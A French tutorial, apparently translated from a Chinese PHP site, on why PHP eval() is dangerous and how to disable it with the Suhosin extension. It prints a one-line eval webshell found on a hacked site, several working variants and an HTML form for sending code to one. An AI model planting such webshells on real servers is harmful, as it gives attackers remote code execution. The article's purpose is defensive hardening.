Comment interdire l'évaluation avec des risques de sécurité en php

Le site Web a déjà été attaqué par des pirates informatiques et nous avons appris que la fonction d'évaluation de PHP présente de grands risques de sécurité. Aujourd'hui, nous allons présenter la méthode de désactivation de l'évaluation. Vous pouvez vous y référer si nécessaire.

Il y a quelque temps, le site a été envahi par des pirates informatiques. Plus tard, au cours de l'enquête, j'ai trouvé un php avec très peu de contenu :

<?php eval($_POST[asda123131323156341]);?>

Ensuite, j'ai cherché en ligne la fonction eval de php et j'ai trouvé ceci. fonction d'évaluation Avec de grands risques pour la sécurité.

Testez-le localement, écrivez un php dans l'environnement local, le contenu est le suivant :

default.php :

<?php eval($_GET[asda]);?>

Puis visitez : localhost/test/default.php?asda=phpinfo();

Vous pouvez voyez qu'il a été exécuté phpinfo.

Ou visitez localhost/test/default.php?asda = echo 11111; vous constaterez également que 1111 est renvoyé.

Les méthodes similaires incluent :

<?php $code="${${eval($_GET[c])}}";?>

Visitez localhost/test/default.php?c=phpinfo(); pour voir

<?php
$code=addslashes($_GET[c]);
eval(""$code""); 
?>

Visitez localhost/test/default.php?c= ${${phpinfo( )}} ; Vous pouvez voir

En utilisant la fonction eval qui peut exécuter PHP, les pirates peuvent l'utiliser pour télécharger certains chevaux de Troie en arrière-plan, tels que le téléchargement de PHP, puis accéder au PHP via l'URL pour obtenir des autorisations plus importantes. Ce type d'intrusion est appelé cheval de Troie en une phrase. Par exemple : écrivez un html avec le contenu suivant :

<html> 
<body> 
<form action="default.php" method="post"> 
<input type="text" name="c" value="phpinfo();"> 
<input type="submit" value="submit"> 
</form> 
</body> 
</html>

Ensuite, écrivez un default.php avec le contenu :

<?php eval($_POST[c]);?>

Dans ce cas, vous pouvez directement soumettre le php que vous souhaitez exécuter et l'exécuter.

Donc : eval() a un grand pouvoir destructeur pour la sécurité PHP. Par conséquent, afin d'empêcher l'invasion de chevaux de Troie comme les suivants lorsqu'elle n'est généralement pas utilisée, elle doit être interdite. !

Cependant, de nombreuses méthodes sur Internet qui utilisent Disable_functions pour désactiver eval sont fausses !

En fait, eval() ne peut pas être désactivé à l'aide de Disable_functions dans php.ini :

parce que eval() est une construction de langage et non une fonction

eval est Zend, donc ce n'est pas une fonction PHP_FUNCTION

Et alors ; à propos de php Et si on interdisait eval ?

Si vous souhaitez désactiver eval, vous pouvez utiliser l'extension php Suhosin :

Après avoir installé Suhosin, chargez Suhosin.so dans php.ini et ajoutez suhosin.executor.disable_eval = on !

En résumé, la fonction eval de php ne peut pas être désactivée en php, nous ne pouvons donc utiliser que des plug-ins !

Quant aux étapes pour installer suhosin pour désactiver la fonction eval : (non testé)

Instructions :

Répertoire d'installation php : /usr/local/php5

Chemin du fichier de configuration php.ini : /usr/local/php5 /etc /php.ini

Répertoire d'installation de Nginx :/usr/local/nginx

Répertoire racine du site Web Nginx :/usr/local/nginx/html

1 Installez l'outil de compilation

yum install wget  make gcc gcc-c++ zlib-devel openssl openssl-devel pcre-devel kernel keyutils  patch perl

2. Installez suhosin

cd /usr/local/src   #进入软件包存放目录
wget  http://download.suhosin.org/suhosin-0.9.33.tgz    #下载
tar zxvf suhosin-0.9.33.tgz   #解压
cd suhosin-0.9.33   #进入安装目录
/usr/local/php5/bin/phpize   #用phpize生成configure配置文件
./configure  --with-php-config=/usr/local/php5/bin/php-config   #配置
make   #编译
make install   #安装
安装完成之后，出现下面的界面，记住以下路径，后面会用到。
Installing shared extensions: /usr/local/php5/lib/php/extensions/no-debug-non-zts-20090626/   #suhosin模块路径

.

3. Configurez php pour prendre en charge suhosin

vi /usr/local/php5/etc/php.ini  
 #编辑配置文件，在最后一行添加以下内容 
extension=/usr/local/php5/lib/php/extensions/no-debug-non-zts-20090626/suhosin.so
suhosin.executor.disable_eval = on

Remarque : suhosin.executor.disable_eval = on est utilisé pour désactiver la fonction eval

4 Test

vi /usr/local/nginx/html/phpinfo.php #Edit

.

<?php
phpinfo();
?>

:wq ! #Enregistrez et quittez

redémarrage du service php-fpm #restartphp-fpm

redémarrage du service nginx #Redémarrez nginx

Remarque : si c'est Apache, c'est pareil, redémarrez simplement Apache.

Ouvrez phpinfo.php dans le navigateur. Comme le montre l'image ci-dessous, vous pouvez voir les informations relatives à suhosin

À ce stade, l'installation de php par suhosin sous Linux est terminée !

Remarque : Quelles seront les conséquences après la désactivation de l'évaluation ? Tout d'abord, les logiciels qui utilisent eval dans le code ne pourront pas l'utiliser, comme les fameux Discuz! Forum et PHPWind Forum ne pourront pas être utilisés normalement, et cela affectera également l'ancienne version de phpMyAdmin. il est mis à jour vers la dernière version 3.2.5, il peut être utilisé, mais il est disponible par défaut, ajoutez $cfg['SuhosinDisableWarning']=true; à config.inc.php pour annuler cet avertissement.

Remarque : en plus de eval, assert est également utilisé de la même manière.

Apprentissage recommandé :

Tutoriel vidéo php

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!